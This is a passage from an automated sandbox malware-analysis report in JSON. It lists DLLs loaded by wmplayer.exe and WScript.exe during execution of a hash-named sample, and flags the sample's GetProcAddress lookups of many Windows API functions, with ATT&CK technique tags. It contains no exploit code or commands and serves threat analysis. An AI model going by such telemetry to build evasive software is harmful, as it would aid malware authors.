\"wmplayer.exe\" loaded module \"KERNEL32.DLL\" at base 77590000\n \"wmplayer.exe\" loaded module \"SHLWAPI.DLL\" at base 75d40000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WMPLOC.DLL\" at base 64120000\n \"wmplayer.exe\" loaded module \"WMP.DLL\" at base 64d20000\n \"wmplayer.exe\" loaded module \"OLE32.DLL\" at base 75da0000\n \"wmplayer.exe\" loaded module \"CRYPTBASE.DLL\" at base 758c0000\n \"wmplayer.exe\" loaded module \"RPCRT4.DLL\" at base 76270000\n \"wmplayer.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75cf0000\n \"wmplayer.exe\" loaded module \"WMPLOC.DLL\" at base 64120000\n \"wmplayer.exe\" loaded module \"COMCTL32.DLL\" at base 74890000\n \"wmplayer.exe\" loaded module \"DWMAPI.DLL\" at base 744d0000\n \"wmplayer.exe\" loaded module \"SHELL32.DLL\" at base 76680000\n \"wmplayer.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75cf0000\n \"wmplayer.exe\" loaded module \"PROFAPI.DLL\" at base 759e0000\n \"wmplayer.exe\" loaded module \"OLEAUT32.DLL\" at base 761d0000\n \"wmplayer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77590000\n \"wmplayer.exe\" loaded module \"SETUPAPI.DLL\" at base 75fd0000\n \"wmplayer.exe\" loaded module \"CLBCATQ.DLL\" at base 773a0000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74660000\n \"wmplayer.exe\" loaded module \"NTMARTA.DLL\" at base 74e30000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MMDEVAPI.DLL\" at base 74530000\n \"wmplayer.exe\" loaded module \"CFGMGR32.DLL\" at base 75cb0000\n \"wmplayer.exe\" loaded module \"MFPLAT.DLL\" at base 63fa0000\n \"wmplayer.exe\" loaded module \"VERSION.DLL\" at base 74e60000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NETPROFM.DLL\" at base 6d9c0000\n \"wmplayer.exe\" loaded module \"CRYPTSP.DLL\" at base 753d0000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75160000\n \"wmplayer.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75960000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NPMPROXY.DLL\" at base 6d450000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WPC.DLL\" at base 69ee0000\n \"wmplayer.exe\" loaded module \"SAMCLI.DLL\" at base 73900000\n \"wmplayer.exe\" loaded module \"SAMLIB.DLL\" at base 747e0000\n \"wmplayer.exe\" loaded module \"NETUTILS.DLL\" at base 74070000\n \"wmplayer.exe\" loaded module \"WINMM.DLL\" at base 70720000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\WINSXS\\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.23894_NONE_5C0BE957A009922E\\GDIPLUS.DLL\" at base 742a0000\n \"wmplayer.exe\" loaded module \"UXTHEME.DLL\" at base 74440000\n \"wmplayer.exe\" loaded module \"USER32.DLL\" at base 765b0000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\JSCRIPT.DLL\" at base 63ef0000\n \"wmplayer.exe\" loaded module \"SXS.DLL\" at base 758d0000\n \"wmplayer.exe\" loaded module \"WTSAPI32.DLL\" at base 73ec0000\n \"wmplayer.exe\" loaded module \"WINSTA.DLL\" at base 75930000\n \"wmplayer.exe\" loaded module \"WINDOWSCODECS.DLL\" at base 73d80000\n \"wmplayer.exe\" loaded module \"IMM32.DLL\" at base 75f00000\n \"wmplayer.exe\" loaded module \"COMCTL32\" at base 74890000\n \"wmplayer.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 75cf0000\n \"wmplayer.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 75cf0000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FIREWALLAPI.DLL\" at base 74e70000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 75da0000\n \"wmplayer.exe\" loaded module \"MF.DLL\" at base 63b00000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WMPEFFECTS.DLL\" at base 63aa0000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MF.DLL\" at base 63b00000\n \"wmplayer.exe\" loaded module \"NTDLL.DLL\" at base 77ac0000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\EXPLORERFRAME.DLL\" at base 711b0000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MLANG.DLL\" at base 63a00000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\KERNEL32.DLL\" at base 77590000\n \"wmplayer.exe\" loaded module \"MSIMG32.DLL\" at base 6d280000\n \"wmplayer.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75ca0000\n \"wmplayer.exe\" loaded module \"WININET.DLL\" at base 77810000\n \"wmplayer.exe\" loaded module \"SECUR32.DLL\" at base 756f0000\n \"wmplayer.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75ce0000\n \"wmplayer.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71550000\n \"wmplayer.exe\" loaded module \"URLMON.DLL\" at base 776c0000\n \"wmplayer.exe\" loaded module \"WMERROR.DLL\" at base 6b940000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMAPI2.DLL\" at base 6ba60000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLEAUT32.DLL\" at base 761d0000\n \"wmplayer.exe\" loaded module \"WINTRUST.DLL\" at base 75b00000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 772d0000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71110000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WScript.exe\" loaded module \"KERNEL32\" at base 77590000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WScript.exe\" loaded module \"CLBCATQ.DLL\" at base 773a0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\VBSCRIPT.DLL\" at base 657a0000\n \"WScript.exe\" loaded module \"OLE32.DLL\" at base 75da0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\ADVAPI32.DLL\" at base 77c30000\n \"WScript.exe\" loaded module \"WINTRUST.DLL\" at base 75b00000\n \"WScript.exe\" loaded module \"CRYPTSP.DLL\" at base 753d0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75160000\n \"WScript.exe\" loaded module \"ADVAPI32.DLL\" at base 77c30000\n \"WScript.exe\" loaded module \"CRYPTBASE.DLL\" at base 758c0000\n \"WScript.exe\" loaded module \"MSISIP.DLL\" at base 6d280000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CRYPT32.DLL\" at base 75b70000\n \"WScript.exe\" loaded module \"IMM32.DLL\" at base 75f00000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHEXT.DLL\" at base 69f10000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCROBJ.DLL\" at base 736f0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHOM.OCX\" at base 72fb0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCRRUN.DLL\" at base 72040000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77590000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSXML3.DLL\" at base 68770000\n \"WScript.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75960000\n \"WScript.exe\" loaded module \"COMCTL32.DLL\" at base 74890000\n \"WScript.exe\" loaded module \"OLEAUT32.DLL\" at base 761d0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74660000\n \"WScript.exe\" loaded module \"NTMARTA.DLL\" at base 74e30000\n \"WScript.exe\" loaded module \"SETUPAPI.DLL\" at base 75fd0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW 